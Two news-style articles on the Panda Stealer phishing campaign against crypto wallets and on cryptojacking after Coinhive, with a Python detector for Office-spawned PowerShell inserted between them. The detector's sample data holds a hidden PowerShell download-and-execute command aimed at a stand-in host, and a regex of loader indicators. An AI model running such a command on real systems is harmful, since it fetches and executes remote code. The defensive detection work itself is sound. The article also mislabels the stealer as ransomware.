Panda attacks on crypto wallets

I’m not talking about attacks by a cuddly black and white bear from China, but instead a series of new ransomware attacks. The ‘Panda’ malware has been targeting cryptocurrency wallets, “along with account credentials from other applications such as NordVPN, Telegram, Discord and Steam,” according to a Coindesk report.

Trend Micro, a cybersecurity company, discovered the malware that steals information and dubbed it ‘Panda Stealer’. The malware has been found targeting individuals across countries including the US, Australia, Japan, and Germany.

The malware begins its infection chain through phishing emails that pretend to be business quote requests.

According to ZDNet, two methods have been linked to the campaign: the first uses attached .XLSM documents that require victims to enable malicious macros. If macros are permitted, a loader then downloads and executes the main stealer.

In the second method, “an attached .XLS file contains an Excel formula that hides a PowerShell command. This command attempts to access a URL to pull a PowerShell script to the victim’s system and to then grab a fileless payload.”

Once downloaded, Panda Stealer will attempt to detect keys and addresses associated with cryptocurrency wallets holding funds including Ethereum (ETH), Litecoin (LTC), Bytecoin (BCN), and Dash (DASH).
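The infection chain described above (a malicious Office document that launches PowerShell to fetch a script from a URL) leaves a recognisable trace on the endpoint: an Office application spawning a script host. The following Python is an added example, not code from the original article or from Trend Micro. It parses constructed process-creation events (the sample lines, the field names and the indicator list are assumptions), flags Office applications spawning a script host, and raises the severity when the child's command line carries download or hidden-window indicators.

```python
import re

# Office binaries that should rarely launch scripting hosts (assumption for this example).
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line fragments that suggest a remote or hidden loader stage (assumed indicator list).
LOADER_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression"
    r"|-enc\w*|\s-e\s|https?://|\bhidden\b"
)
# One key=value event per line; values (paths, command lines) may contain spaces.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")

# Constructed sample events in a Sysmon-like key=value layout (not real telemetry).
SAMPLE_EVENTS = [
    r"ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell -w hidden -nop -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage1.ps1')",
    r"ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Image=C:\Windows\System32\splwow64.exe CommandLine=splwow64.exe 12288",
    r"ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell Get-Process",
    r"ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Image=C:\Windows\System32\cmd.exe CommandLine=cmd /c echo hi",
]

def parse_event(line):
    """Turn one key=value event line into a dict."""
    return {k: v for k, v in FIELD_RE.findall(line)}

def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """None for benign, 'medium' when Office spawns a script host, 'high' when loader hints are present."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None
    cmd = event.get("CommandLine", "").lower()
    return "high" if LOADER_RE.search(cmd) else "medium"

def scan(lines):
    """Return (severity, parent, child) for every suspicious event in order."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        sev = classify(ev)
        if sev:
            alerts.append((sev, basename(ev["ParentImage"]), basename(ev["Image"])))
    return alerts

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The "medium" tier is deliberately noisy: a print-spooler helper launched by Excel is left alone, but any script host spawned by Office is worth a look even without download indicators.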

Trend Micro researchers who discovered the attack said, “Crypto wallets are now as big of a target for online theft as banking accounts are. With more people getting into cryptocurrencies and the values of said cryptocurrencies still increasing, this will only become a greater threat moving forward.”

They also pointed out that there is more risk here as unlike theft via a bank or a credit card, there may not be a central authority that can undo malicious transactions. Once you lose your money and the transaction goes on the blockchain, it’s likely gone forever.

“None of this is particularly novel in and of itself – malicious Office documents are well known, so is fileless loading,” Trend Micro researchers said. “The main ‘new’ aspect here is the target of the data theft.” For example, attackers are setting their sights on applications like Discord and Telegram – popular communications platforms for cryptocurrency communities.

Even if this type of attack is new, Trend Micro recommends following standard security practices: not opening attachments sent via email, not clicking on unknown links, and keeping software up to date are still basic measures people can take to avoid malware and other security breaches. They added that the best advice is to secure your cryptocurrency wallets, recommended using strong, unique passwords, and commented, “For investors who are more interested in holding cryptocurrencies for the long term instead of actively trading them, the use of hardware-based/offline wallets may well be safer, if less convenient to add to or sell from.”

Cryptojacking in 2019 is not dead — it’s evolving!

Cryptojackers have shut down university networks and government websites, but one case attracted a lot of attention: the use of the Coinhive mining service, which focused on mining Monero.

With the closure of Coinhive it appeared that cryptojacking might be coming to an end. Coinhive was a cryptocurrency mining service that relied on a small chunk of computer code installed on websites. It released its mining code in 2017, pitching it as a way for website owners to earn an income without running intrusive or annoying advertisements. However, although Coinhive was not inherently malicious code, it became popular among hackers for cryptojacking. The more people visited a site, the more processing power was siphoned off to mine Monero.

Coinhive malware

The platform had seemed like a good idea until the software went on to form the foundation of the notorious cryptojacking malware that ended up affecting millions of user devices, spiking electricity bills, and draining batteries to secretly and illicitly mine cryptocurrency, as Conor Maloney writes for CCN. Furthermore, as more and more criminals hacked sites and planted the Coinhive file, the issue shot completely out of control. Maloney writes: “Coinhive was listed as the world’s greatest online malware threat by cybersecurity firm Check Point for 15 consecutive months, and an estimated 5% of all Monero was mined through cryptojacking.”

Coinhive announced that it would be shutting down operations on 8th March 2019, and many thought that would be the end of intensive cryptojacking activity. However, Maloney points out that while the cryptojackers can’t turn to Coinhive anymore, they will look for other means of attack.

The Coinhive vacuum is waiting to be filled

Chris Dawson, Threat Intelligence Lead at the security company Proofpoint, told Maloney that Coinhive was far from the only cryptojacking malware on the market, adding that “the fall of Coinhive leaves a power vacuum waiting to be filled.” Dawson sees a threat coming from other forms of malware, such as “banking trojans, credential stealers and pieces of malware which sit on machines.”

Others, such as Jerome Segura of Malwarebytes, believe the criminal industry is slowing down. He told ZDNet: “There are still a lot of hacked sites with Coinhive code, but I have a feeling these are mostly remnants from past hacks. Most of what I see these days is CoinIMP [a Coinhive competitor] and it’s been active again with Drupal hacks recently. But overall, I think the trend is nearing out.”

Is Segura too optimistic? Ransomware like WannaCry and Petya has dealt catastrophic blows, taking down services at hospitals, car factories, government facilities, and airports as well as infecting personal devices to extract a ransom that is usually payable in Bitcoin. And cryptojacking malware still exists — Cryptoloot being one example, the second most lethal after Coinhive. There is also Emotet, a banking Trojan, which can infect a computer as a malicious attachment and be used to spread other forms of malicious software, plus a host of password-collecting bots.

It may be good news that Coinhive has closed down, but we cannot be complacent and believe the threat of cryptojacking has gone away. As long as there is cryptocurrency for the taking, cryptojackers will be evolving their tactics for getting their hands on it, and we need to be more vigilant than ever.